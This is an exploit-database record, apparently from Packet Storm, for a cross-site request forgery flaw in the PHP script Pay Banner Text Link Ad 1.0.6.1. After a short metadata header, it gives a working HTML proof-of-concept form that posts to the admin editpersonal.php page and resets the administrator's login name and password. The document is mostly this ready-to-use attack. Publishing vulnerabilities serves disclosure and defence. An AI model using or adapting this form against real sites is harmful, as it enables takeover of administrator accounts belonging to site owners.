Pay Banner Text Link Ad 1.0.6.1 Cross Site Request Forgery

2017-09-07T00:00:00
ID PACKETSTORM:144044
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-09-07T00:00:00

Description

                                        
                                            `# # # # #   
# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin User&Pass)  
# Dork: N/A  
# Date: 06.09.2017  
# Vendor Homepage: http://www.dijiteol.com/  
# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html  
# Demo: http://dijiteol.com/demos/pbtla  
# Version: 1.0.6.1  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: N/A  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
#   
# Proof of Concept:  
<html>  
<body>  
<form method="post" action="http://localhost/[PATH]/admin/editpersonal.php">  
<!--Change admin username-->  
<input name="login" type="text" size="20" maxlength="15" value="admin">  
<!--Change admin password-->  
<input name="pass" type="text" class="keyboardInput" size="20" maxlength="15" value="efe">  
<input type="submit" name="Submit" value="Update">  
</form>  
</body>  
</html>  
# # # # #  
  
  
`